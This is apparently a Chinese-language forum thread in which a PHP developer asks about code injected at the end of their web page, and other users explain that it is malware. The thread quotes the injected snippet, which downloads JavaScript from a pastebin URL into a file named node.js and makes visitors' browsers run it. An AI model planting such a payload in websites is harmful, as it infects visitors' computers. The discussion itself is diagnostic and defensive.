網頁PHP程式碼的檔尾被加入如下列語法,因為不知要開啟的原始碼用意,想請教先進!感謝解惑! 怕影響PO文,已將HTML標籤改為全型符號。
<?php
file_put_contents("node.js", fopen("http://pastebin.com/raw/XQ8X1Cmv", 'r'));
?>
<html>
<script>
var commandModuleStr = '<script src="./node.js" type="text/javascript"></script>';
document.write(commandModuleStr);
</script>
</html>
已邀請的邦友 {{ invite_list.length }}/5
這是用來放毒的.
file_put_contents("node.js", fopen("http://pastebin.com/raw/XQ8X1Cmv", 'r'));
這段程式碼讀取外部的連結的javascript內容, 將這些內容寫為您網站根目錄中, 檔名是node.js, 成為偽裝成node.js的javascript毒. 您可以找看看是否有node.js, 看看其內容是什麼.
<script>
var commandModuleStr = '<script src="./node.js" type="text/javascript"></script>';
document.write(commandModuleStr);
</script>
您的網站訪客的瀏覽器會執行剛剛的node.js毒, 並且會將這node.js毒放入瀏覽器緩存中, 即使您已清除主機端的放毒程式, 在緩存的有效時間中每次開啟你們的網站就會執行.至於執行什麼, 就要看這個node.js的毒了.
1.我有遇過
2.是惡意程式碼
3.就算不是,pastebin那個URL也已失效
結論
1.植入的程式碼全部刪一刪
2.檢查server的安全漏洞,免得再被植入
非常感謝你!我已經移除該程式碼了!
只是很想知道到底那個連結是幹了哪些壞事!
我也遇過, 最常遇到的. 通常是用來在畫面上崁入js 程式. 影響訪客的電腦. 例如讓訪客 中木馬, 或者幫忙點擊網站
那...可以請教這要怎麼預防?
我也有在寫PHP~
可是對資安沒甚麼觀念~0..0
iThome鐵人賽
看影片追技術